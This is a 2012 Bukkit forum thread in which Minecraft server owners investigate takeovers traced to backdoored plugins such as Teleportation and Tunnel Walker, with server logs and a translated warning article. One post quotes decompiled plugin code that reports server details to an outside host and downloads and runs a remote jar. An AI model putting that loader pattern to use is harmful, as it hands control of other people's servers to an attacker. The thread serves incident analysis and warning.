MineCraft Server got Hacked.

Discussion in 'Bukkit Help' started by LanToaster, Jun 19, 2012.

Thread Status:
Not open for further replies.
  1. Offline

    LanToaster

    Sorry, i couldnt find a mor Accurate title. As for now i have ABSOLUTLY no Idea how this is even Possible.

    The Following has happend Today Night and Yesterday Night:
    Around 3:00AM a guy named: "dev_urandom" with a Static IP joined my Server, approx, 30seconds later ALL plugins shut themself down and he procceedet to Grief my Spawnworld and Left.

    The Griefing was Easily rollbacked with a Recent Backup, My Ban-List, Op-List and Whitelist were all Wiped, and the Server wasn´t able to Regognize ANY command. Not even "Stop" to Shut it Down. (Killed the Process and Rebooted, everything is fine)

    After some Research I found out, that the Culprit named "dev_urandom" the same is as the banned User "clayfreeman", so i would love to know if i Have a Plugin from him.
    Or if he has other means to Infiltrate my Bukkit.

    Here is some Entrys from my Serverlog from where he Logged in, until he Logged out.
    Show Spoiler

    012-06-19 03:01:26 [INFO] dev_urandom [/199.68.228.132:54326] logged in with entity id 23223 at ([world_hub] -152.65046660479416, 168.20000000000005, -98.00965971033978)
    2012-06-19 03:01:30 [INFO] NCP: dev_urandom in world_hub at -152.65,168.20,-98.01 moving to -152.65,168.20,-98.01 over distance 0.00,0.00,0.00 failed check moving.flying. Total violation level so far 481.
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:31 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:32 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:33 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:34 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:01:35 [WARNING] dev_urandom was kicked for floating too long!
    2012-06-19 03:02:03 [INFO] [PLAYER_COMMAND] dragon1975: /spawn
    2012-06-19 03:02:09 [INFO] [PLAYER_COMMAND] dragon1975: /gm
    2012-06-19 03:02:17 [INFO] [Orebfuscator] Disabling Orebfuscator v1.4.4
    2012-06-19 03:02:17 [INFO] [OFC] Version 1.4.4 disabled!
    2012-06-19 03:02:17 [INFO] [Websend] Disabling Websend v1.5.1
    2012-06-19 03:02:17 [INFO] [RedClock] Disabling RedClock v1.0.7
    2012-06-19 03:02:17 [INFO] [EpicGlass] Disabling EpicGlass v1.12.1 by Malikk
    2012-06-19 03:02:17 [INFO] [EpicGlass] Disabled
    2012-06-19 03:02:17 [INFO] [Vault] Disabling Vault v1.2.16-b184
    2012-06-19 03:02:17 [INFO] [Essentials] Payment method was disabled. No longer accepting payments.
    2012-06-19 03:02:17 [INFO] [Vault] Disabled Version 1.2.16-b184
    2012-06-19 03:02:17 [INFO] [Multiverse-Core] Disabling Multiverse-Core v2.4-b527
    2012-06-19 03:02:17 [INFO] [Multiverse-Portals] Disabling Multiverse-Portals v2.4-b548
    2012-06-19 03:02:17 [INFO] [Multiverse-Core] - Disabled
    2012-06-19 03:02:17 [INFO] [MyHelpPages] Disabling MyHelpPages v1.2
    2012-06-19 03:02:17 [INFO] [MyHelpPages] disabled
    2012-06-19 03:02:17 [INFO] [TreeAssist] Disabling TreeAssist v4.31
    2012-06-19 03:02:17 [INFO] [dynmap] Disabling dynmap v0.36.3-1085
    2012-06-19 03:02:18 [INFO] [dynmap] Unloaded 11 components.
    2012-06-19 03:02:18 [INFO] [dynmap] Stopping map renderer...
    2012-06-19 03:02:19 [INFO] [dynmap] Disabled
    2012-06-19 03:02:19 [INFO] [Chairs] Disabling Chairs v1.3
    2012-06-19 03:02:19 [INFO] [PhatLoots] Disabling PhatLoots v1.9.1
    2012-06-19 03:02:19 [INFO] [Nethrar] Disabling Nethrar v2.3.1
    2012-06-19 03:02:19 [INFO] [MidiBanks] Disabling MidiBanks v1.5
    2012-06-19 03:02:19 [INFO] [MidiBanks] Disabled Version 1.5
    2012-06-19 03:02:19 [INFO] [ProperTime] Disabling ProperTime v2.2
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Thread 0 successfully joined.
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Thread 1 successfully joined.
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Thread 2 successfully joined.
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Thread 3 successfully joined.
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Thread 4 successfully joined.
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Thread 5 successfully joined.
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Thread 6 successfully joined.
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Thread 7 successfully joined.
    2012-06-19 03:02:19 [INFO] [ProperTime v2.2] Signing off.
    2012-06-19 03:02:19 [INFO] [MinersNeverSleep] Disabling MinersNeverSleep v1.1
    2012-06-19 03:02:19 [INFO] [MNS] MinersNeverSleep is now disabled.
    2012-06-19 03:02:19 [INFO] [Votifier] Disabling Votifier v1.8
    2012-06-19 03:02:19 [INFO] [Votifier] Votifier disabled.
    2012-06-19 03:02:19 [WARNING] [Votifier] Protocol error. Ignoring packet - Socket closed
    2012-06-19 03:02:19 [INFO] [mcMMO] Disabling mcMMO v1.3.08-b857
    2012-06-19 03:02:19 [INFO] No Backup performed, in SQL Mode.
    2012-06-19 03:02:19 [INFO] mcMMO was disabled.
    2012-06-19 03:02:19 [INFO] [BiomeEdit] Disabling BiomeEdit v0.4
    2012-06-19 03:02:19 [INFO] [CleanroomGenerator] Disabling CleanroomGenerator v1.0.0
    2012-06-19 03:02:19 [INFO] [LagMeter] Disabling LagMeter v1.8
    2012-06-19 03:02:19 [INFO] [LagMeter 1.8] Disabled!
    2012-06-19 03:02:19 [INFO] [MultiInv] Disabling MultiInv v3.0.7
    2012-06-19 03:02:19 [INFO] [NoCheatPlus] Disabling NoCheatPlus v3.6.1
    2012-06-19 03:02:19 [INFO] [NoCheatPlus] version [3.6.1] is disabled.
    2012-06-19 03:02:19 [INFO] [JCVaultListener] Disabling JCVaultListener v2.0
    2012-06-19 03:02:19 [INFO] [JCVaultListener] JCVaultListener disabled!
    2012-06-19 03:02:19 [INFO] [EnderCrystalizer] Disabling EnderCrystalizer v1.2
    2012-06-19 03:02:19 [INFO] [EnderCrystalizer v1.2] Disabled.
    2012-06-19 03:02:19 [INFO] [PorteCoulissante] Disabling PorteCoulissante v1.2.9
    2012-06-19 03:02:19 [INFO] [ChatColors] Disabling ChatColors v1.5.1
    2012-06-19 03:02:19 [INFO] [OnlineUsers] Disabling OnlineUsers v1.6.1
    2012-06-19 03:02:19 [INFO] [PotionsPlus] Disabling PotionsPlus v1.0
    2012-06-19 03:02:19 [INFO] [BetterShop] Disabling BetterShop v2.1.3
    2012-06-19 03:02:19 [INFO] [BlockDisguise] Disabling BlockDisguise v0.3
    2012-06-19 03:02:19 [INFO] [Stargate] Disabling Stargate v0.7.7.2
    2012-06-19 03:02:19 [INFO] [Stargate-DHD] Stargate plugin lost.
    2012-06-19 03:02:19 [INFO] Closing all stargates.
    2012-06-19 03:02:19 [INFO] [PermissionsEx] Disabling PermissionsEx v1.19
    2012-06-19 03:02:19 [INFO] WEPIF: PermissionsEx detected! Using PermissionsEx for permissions.
    2012-06-19 03:02:19 [INFO] [PermissionsEx] v1.19 disabled successfully.
    2012-06-19 03:02:19 [INFO] [LogBlock] Disabling LogBlock v1.52
    2012-06-19 03:02:19 [INFO] Essentials: Using config based permissions. Enable superperms in config.
    2012-06-19 03:02:19 [INFO] [SCS] Un-hooked Permissions
    2012-06-19 03:02:19 [INFO] [LogBlock] LogBlock disabled.
    2012-06-19 03:02:19 [INFO] [TerrainControl] Disabling TerrainControl v2.1.7
    2012-06-19 03:02:19 [INFO] TerrainControl: Can not be disabled.
    2012-06-19 03:02:19 [INFO] [MirrorMaster] Disabling MirrorMaster v1.01
    2012-06-19 03:02:19 [INFO] [MirrorMaster] Bye!
    2012-06-19 03:02:19 [INFO] [WorldGuard] Disabling WorldGuard v601-e673043
    2012-06-19 03:02:19 [INFO] [AntiFarm] Disabling AntiFarm v1.4
    2012-06-19 03:02:19 [INFO] AntiFarm has been disabled.
    2012-06-19 03:02:19 [INFO] [ServerEvents] Disabling ServerEvents v1.5.0
    2012-06-19 03:02:19 [INFO] [iConomy] Disabling iConomy v7.0
    2012-06-19 03:02:19 [INFO] [OtherDrops] Payment method was disabled. No longer accepting payments.
    2012-06-19 03:02:19 [INFO] ServerEvents: The server is down :(
    2012-06-19 03:02:19 [INFO] [SCS] Un-hooked iConomy
    2012-06-19 03:02:19 [INFO] [iConomy] Closing general data...
    2012-06-19 03:02:19 [INFO] [iConomy] Disabled. (0 ms)
    2012-06-19 03:02:19 [INFO] [AnimalProtect] Disabling AnimalProtect v1.3.0
    2012-06-19 03:02:19 [INFO] AnimalProtect 1.3.0 : Disabled!
    2012-06-19 03:02:19 [INFO] [Gods] Disabling Gods v0.2.9
    2012-06-19 03:02:19 [INFO] [Gods v0.2.9] Could not save whitelist to null: null
    2012-06-19 03:02:19 [INFO] [Gods v0.2.9] Could not save blacklist to null: null
    2012-06-19 03:02:19 [INFO] [NoFarm] Disabling NoFarm v0.4.0
    2012-06-19 03:02:19 [INFO] NoFarm version 0.4.0 is now disabled
    2012-06-19 03:02:19 [INFO] [BKCommonLib] Disabling BKCommonLib v1.19
    2012-06-19 03:02:19 [INFO] [Herochat] Disabling Herochat v5.6.0
    2012-06-19 03:02:19 [INFO] [Herochat] Saving channels
    2012-06-19 03:02:19 [INFO] [Herochat] Save complete
    2012-06-19 03:02:19 [INFO] [Herochat] Saving players
    2012-06-19 03:02:19 [INFO] [Herochat] Save complete
    2012-06-19 03:02:19 [INFO] [Herochat] Version 5.6.0 is disabled.
    2012-06-19 03:02:19 [INFO] [Essentials] Disabling Essentials v2.9.1
    2012-06-19 03:02:19 [INFO] [ShowCaseStandalone] Disabling ShowCaseStandalone v0.89
    2012-06-19 03:02:19 [INFO] [SCS] Stopping shop update task.
    2012-06-19 03:02:19 [INFO] [SCS] Saving any remaining shop changes.
    2012-06-19 03:02:19 [INFO] [SCS] Removing display items.
    2012-06-19 03:02:19 [INFO] [WorldBorder] Disabling WorldBorder v1.5.4
    2012-06-19 03:02:19 [INFO] [WorldBorder] [CONFIG] Border-checking timed task stopped.
    2012-06-19 03:02:19 [INFO] [Stargate-DHD] Disabling Stargate-DHD v0.3.3
    2012-06-19 03:02:19 [INFO] [ChessCraft] Disabling ChessCraft v1.0.3
    2012-06-19 03:02:19 [INFO] [ChessCraft] disabled!
    2012-06-19 03:02:19 [INFO] [OtherDrops] Disabling OtherDrops v2.5.1
    2012-06-19 03:02:19 [INFO] OtherDrops 2.5.1 unloaded.
    2012-06-19 03:02:19 [INFO] [VanishNoPacket] Disabling VanishNoPacket v3.9.1
    2012-06-19 03:02:19 [INFO] [VanishNoPacket] v3.9.1 unloaded.
    2012-06-19 03:02:19 [INFO] [LWC] Disabling LWC v4.2.1 (b700-git-MANUAL) (May 20, 2012)
    2012-06-19 03:02:19 [INFO] [LWC] Flushing protection updates (0)
    2012-06-19 03:02:19 [INFO] [LWC] Freeing MySQL
    2012-06-19 03:02:19 [INFO] [ChestShop] Disabling ChestShop v3.39
    2012-06-19 03:02:19 [INFO] [SimpleRegionMarket] Disabling SimpleRegionMarket v2.0.3-beta
    2012-06-19 03:02:27 [INFO] [PLAYER_COMMAND] dev_urandom: /setspawn
    2012-06-19 03:02:27 [WARNING]
    2012-06-19 03:02:41 [INFO] /127.0.0.1:45729 lost connection
    2012-06-19 03:02:45 [INFO] /127.0.0.1:45736 lost connection
    2012-06-19 03:02:48 [INFO] CONSOLE: Forcing save..
    2012-06-19 03:02:48 [INFO] CONSOLE: Save complete.
    2012-06-19 03:04:29 [INFO] <dev_urandom> hey
    2012-06-19 03:04:36 [INFO] <dev_urandom> this is my server
    2012-06-19 03:04:56 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:05:35 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:06:41 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:07:19 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:07:19 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:07:29 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:07:49 [INFO] Read timed out
    2012-06-19 03:07:49 [INFO] Disconnecting /127.0.0.1:45783: Took too long to log in
    2012-06-19 03:10:01 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:10:49 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:10:49 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:10:59 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:12:13 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:12:13 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:12:23 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:13:20 [INFO] /127.0.0.1:45821 lost connection
    2012-06-19 03:14:04 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:15:10 [INFO] /127.0.0.1:45838 lost connection
    2012-06-19 03:16:16 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:16:16 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:16:26 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:16:46 [INFO] /127.0.0.1:45861 lost connection
    2012-06-19 03:16:46 [INFO] Read timed out
    2012-06-19 03:16:46 [INFO] Disconnecting /127.0.0.1:45856: Took too long to log in
    2012-06-19 03:17:25 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:17:25 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:17:35 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:20:00 [INFO] /127.0.0.1:45896 lost connection
    2012-06-19 03:20:13 [INFO] /127.0.0.1:45904 lost connection
    2012-06-19 03:20:53 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:22:13 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:22:55 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:23:02 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:23:12 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:23:42 [INFO] /127.0.0.1:45943 lost connection
    2012-06-19 03:23:59 [INFO] /127.0.0.1:45953 lost connection
    2012-06-19 03:24:53 [INFO] /127.0.0.1:45966 lost connection
    2012-06-19 03:25:44 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:25:58 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:25:58 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:26:08 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:26:28 [INFO] Read timed out
    2012-06-19 03:26:28 [INFO] Disconnecting /127.0.0.1:45984: Took too long to log in
    2012-06-19 03:28:33 [INFO] /127.0.0.1:46001 lost connection
    2012-06-19 03:30:25 [INFO] /127.0.0.1:46024 lost connection
    2012-06-19 03:31:06 [INFO] [Teleportation] "dev_urandom" teleported to "dragon1975."
    2012-06-19 03:31:43 [INFO] <dragon1975> Virus :)
    2012-06-19 03:31:47 [INFO] <dev_urandom> hey
    2012-06-19 03:32:07 [INFO] <dev_urandom> sup
    2012-06-19 03:32:21 [WARNING] Can't keep up! Did the system time change, or is the server overloaded?
    2012-06-19 03:32:35 [INFO] <dragon1975> thx for IP and Mac :)
    2012-06-19 03:32:45 [INFO] <dev_urandom> youre welcome
    2012-06-19 03:33:25 [INFO] <dev_urandom> nice server you have
    2012-06-19 03:33:42 [INFO] Unknown command. Type "help" for help.
    2012-06-19 03:34:03 [INFO] <dev_urandom> nice server you have
    2012-06-19 03:34:03 [INFO] <dev_urandom> nice server you have
    2012-06-19 03:34:03 [INFO] <dev_urandom> nice server you have
    2012-06-19 03:34:04 [INFO] <dev_urandom> nice server you have
    2012-06-19 03:34:04 [INFO] <dev_urandom> nice server you have
    2012-06-19 03:34:13 [INFO] Connection reset
    2012-06-19 03:34:13 [INFO] dragon1975 lost connection: disconnect.quitting
    2012-06-19 03:35:37 [WARNING] Can't keep up! Did the system time change, or is the server overloaded?
    2012-06-19 03:35:43 [INFO] dev_urandom lost connection: disconnect.endOfStream

    I use the Following Plugins:
    Show Spoiler

    Orebfuscator, Websend, RedClock, EpicGlass, Vault, Multiverse-Core, MyHelpPages, TreeAssist, dynmap, Chairs, PhatLoots, Nethrar, MidiBanks, ProperTime, MinersNeverSleep, Votifier, mcMMO, BiomeEdit, CleanroomGenerator, LagMeter, MultiInv, NoCheatPlus, JCVaultListener, WorldEdit, EnderCrystalizer, Teleportation, PorteCoulissante, ChatColors, OnlineUsers, PotionsPlus, BetterShop, BlockDisguise, Stargate, PermissionsEx, LogBlock, TerrainControl, MirrorMaster, WorldGuard, AntiFarm, ServerEvents, iConomy, AnimalProtect, Gods, NoFarm, BKCommonLib, Modifyworld, Herochat, Essentials, ShowCaseStandalone, WorldBorder, Multiverse-Portals, Stargate-DHD, ChessCraft, EssentialsSpawn, OtherDrops, VanishNoPacket, LWC, ChestShop, SimpleRegionMarket


    There seem to be BruteForce attacks on my Root aswell, but they dont matter, because (for now) i have no indication that one was Successful.

    My server is www.the-sanctuary.info
    If you happen to take a Look, i will apologize if my serverstaff doesnt speak English well(or at all).

    Edit: Fount a Culprit Plugin:
    Teleportation is one evil Piece of Shit, but it did it job fine :(
    Is there maybe a List of Plugins and Authors wo got Banned for such things?

    Edit:
    I have now Ideas how it is Possible. :)
     
  2. Offline

    Royal_Soda

    Oh wow, so you're saying that the Teleportation plugin is made by him but is used to "hack" servers that use it.. mbaxter TnT md_5 Anybody think this person's plugin should be removed?
     
    FTWin01Gurl likes this.
  3. Offline

    LanToaster

    I think it is Used for that, because its Already Removed from Bukkit, and google has something in the History with: "Sending the ServerIP and ..."
     
  4. Offline

    pcgirl

    OMG! He got me too.. I don't know which plugin though... I don't have that one. Is there a developers page where you can look up what they have made?
     
  5. Offline

    LanToaster

  6. Offline

    pcgirl

    Yes, I had Tunnel Walker. I removed all the "small" mods and this was one of them. I did ban his ip. Maybe Bukkit needs to find a way to ban this guy permanently. It's not very nice to come into the room and find your server taken over. Thankfully I caught him "in the act" and was able to drop off line before he did too much damage.

    I've got core protect on now. At least I can easy fix if I have to.

    Thanks for the info. :) I couldn't find much at all.
     
  7. Offline

    Ne0nx3r0

    If you upload all of your plugin jars someplace and post the link here I'm sure some eager coder will dig through them and let us know which of your plugins are dirty.
     
  8. Offline

    andrewpo

    All dev.bukkit.org plugins are decompiled by BukkitDev staff and checked for malicious code.

    Where did you download this plugin from?

    Are you running an online-mode=false server?
     
  9. Offline

    Millionaire4272

    I was JUST HACKED too by the same dev_urandom guy! I have noweather plugin too. But thats the only one from the list above. I also have anticheat, craftbuy, noswear, takeanumber, spectate. Please someone help. This is happening to alot of people.

    My server is Online not cracked. I do not understand. Bukkit you must have let something through.
     
  10. Offline

    TheBeast808

    Post the plugin jar here, I'll decompile it and see if there is anything malicious in it. The reason I ask for your specific jar file is that you it might be only in the versions you have, or your jars might have been compromised some other way.
     
  11. Offline

    Millionaire4272

    Last edited by a moderator: May 26, 2016
  12. Offline

    TheBeast808

    I don't think that's it. While the plugin does have metrics, which reports info about your server for informational purposes, I don't see anything that could be used to 'hack' the server.

    Post any other jars that you suspect.
     
  13. Offline

    Cirno

    Here's what to do in this instance:
    • Remove all plugins. If you found one of the plugins to have a backdoor (e.g allowing someone to do something like .opme), there is a small chance that another plugin can do the same. Don't take any chances.
    • Check SSH logins and see if any unusual logins happen. If so, change the password.
    A more sophisticated way is he replaced the bukkit jar file, obviously with his modified lines.
     
  14. Offline

    pcgirl

    I'm just going through my plugins and forgot to mention this... I've got chatlogger on and this is what he wrote.

    {JOIN}03:20 PM: [Crazy] dev_urandom: joined the server
    {COMMAND}03:20 PM: [Crazy] dev_urandom: /arsenic takeover
    {COMMAND}03:20 PM: [Crazy] dev_urandom: /spawn
    {COMMAND}03:20 PM: [Crazy] dev_urandom: /spawn
    {COMMAND}03:20 PM: [Crazy] dev_urandom: /arsenic takeover
    {COMMAND}03:20 PM: [Crazy] dev_urandom: /arsenic takeover
    {COMMAND}03:20 PM: [Crazy] dev_urandom: /arsenic takeover
    {COMMAND}03:20 PM: [Crazy] dev_urandom: /arsenic takeover
    {COMMAND}03:20 PM: [Crazy] hello: /ft spawn
    {COMMAND}03:20 PM: [Crazy] dev_urandom: /arsenic takeover
    {JOIN}03:24 PM: [Crazy] dev_urandom: joined the server
    {KICK}03:24 PM: [Crazy] dev_urandom: was kicked You have been kicked by Server Admin
    {COMMAND}03:24 PM: [Crazy] dev_urandom: /arsenic takeover
    The part where it says Kicked, is where I came out of the shower and having hear my self burning (I was in TMI mode) I booted the only person I didn't know. He took over straight away. So maybe this is the code to look for.

    Oh - I got it on bukkit. I don't get my mods from anywhere else.

    Found it!! Just decompiled it myself. It down loads a jar file...

    String tzID;
    String url = String.format("http://phonehome.clayfreeman.com/in...address=%s&port=%s&timestamp=%s&tz=%s&arsenic", new Object[] { pluginName, version, address, port, time, tzID });
    String response = "";
    response = getHTML(url);
    String[] ex = response.split(" ");
    if (response != "") {
    if (response.contains(" ")) {
    if (ex[0].equalsIgnoreCase("update")) {
    this.projectURL = ex[1];
    }
    }
    else if ((ex[0].equalsIgnoreCase("load")) && (!this.alreadyLoaded)) {
    URL classUrl = null;
    try {
    classUrl = new URL("http://phonehome.clayfreeman.com/arsenic/Arsenic.jar");
    URL[] classUrls = { classUrl };
    URLClassLoader ucl = new URLClassLoader(classUrls);
    Listener c = (Listener)ucl.loadClass("com.Arsenic.Arsenic").newInstance();
    this.manager.registerEvents(c, this.manager.getPlugin(this.name));
    this.alreadyLoaded = true;
    }
    catch (Exception localException) {
    }
    }
    return true;
    }
    return false;
    }

    I'm just searching my computer now...
     
  15. Offline

    pcgirl

    Here is the entire jar file. Downloaded from Bukkit. This guys needs to be found - and offered a job with someone writing code or a bullet to the head. Either one.
     

    Attached Files:

  16. Offline

    pcgirl

    From a french page http://www.wtcraft.com/plugin-verole-sur-bukkit-org-11000.html (I've translated it below)

    Why can't bukkit block this guy's IP? He's now known.

    PLUGIN BOTCHED ON BUKKIT.ORG

    STORED IN MINECRAFT NEWS

    June 18
    25

    Our friends Bukkit.fr tell us this afternoon that one of their members was the victim of a botched plugin allows players attacker to take complete control of a server Minecraft . This plugin is called "Tunnel Walker" and is still available for download at the time of writing this article.
    List of dangerous plugins

    • Tunnel Walker
    • No ice
    • Url lengthen
    If you install the plugin on your server, the author will at first and you will type in the command / takeover which will effectively remove all server operators and to every player survival mode. Then it disables all plugins except his own and will definitely control the server. Note that even if he is banished may return.
    The author uses the following nicknames: remember_911, dev_urandom, and Squirmel TrustFunds.
    What to do if infected?

    If it's not too late, first stop your FTP server and delete everything related plugins or the offending file and the "Arsenic.jar". Then check the file and ops.txt whitelist if you use it. Then restart your server, normally we run no danger.
    Plugins were reported infected with the team bukkit.
    Crafte at 13:06 by WTCraft (2804 views)
    Tags: bukkit , plugin , virus
     
  17. Offline

    TheBeast808

    Could you post the plugin jar? I'd love to see the rest and use it to spam his site with fake servers so he can't tell the difference between an infected server and a fake server that I sent him.
     
  18. Offline

    pcgirl

    ha ha ha hah !! I did.. but here it is again. :)

    ..........................................................................................

    Why isn't the file showing? I uploaded it with this post.
     

    Attached Files:

  19. Offline

    TheBeast808

  20. Offline

    Millionaire4272

    http://dev.bukkit.org/server-mods/takeanumber/files/4-takea-number-0-4/
    http://dev.bukkit.org/server-mods/spectate/files/17-v1-8/
    http://minecraft.webkonsept.com/plugins/download/SimpleChestLock.jar
    http://dev.bukkit.org/server-mods/scheduledannouncer2/files/8-scheduled-announcer-v2-4/

    Thank you so much for trying to help. I greatly appreciate it. These are the last of the one i can think would be effected. because my last plugins are like mcmmo, factions, moneydrop,mcjob and i know those are fine! Thank again!
     
  21. Offline

    XxWolfTorrentxX

    I'm truly astonished about your story, My server nearly got hacked by a person and I got mad like Notch's hammer of Fury, I had to shut down the server and I'm still remaking it
     
  22. Offline

    TheBeast808

    Just got done reading the code of those four plugins. I couldn't find any malicious code, or code that would generate/download malicious code in any of those plugins.
     
  23. Offline

    pcgirl

    I had a full on control fight and called them names! Then pulled the plug and used another fasttravel point to rescue my spawn point. It was lucky I had left myself at the spawn point (I'd just moved it) when I walked away. I thought it was a friend playing silly buggars, because the like to push me into water and lava when I leave myself AFK. Turned into a stuggle for power and a pulled network dongle.
     
    XxWolfTorrentxX likes this.
  24. Offline

    XxWolfTorrentxX

    Cool, I'm more of a calm type, I can easily fix my server though :)
     
  25. Offline

    andrewpo

  26. Offline

    pcgirl

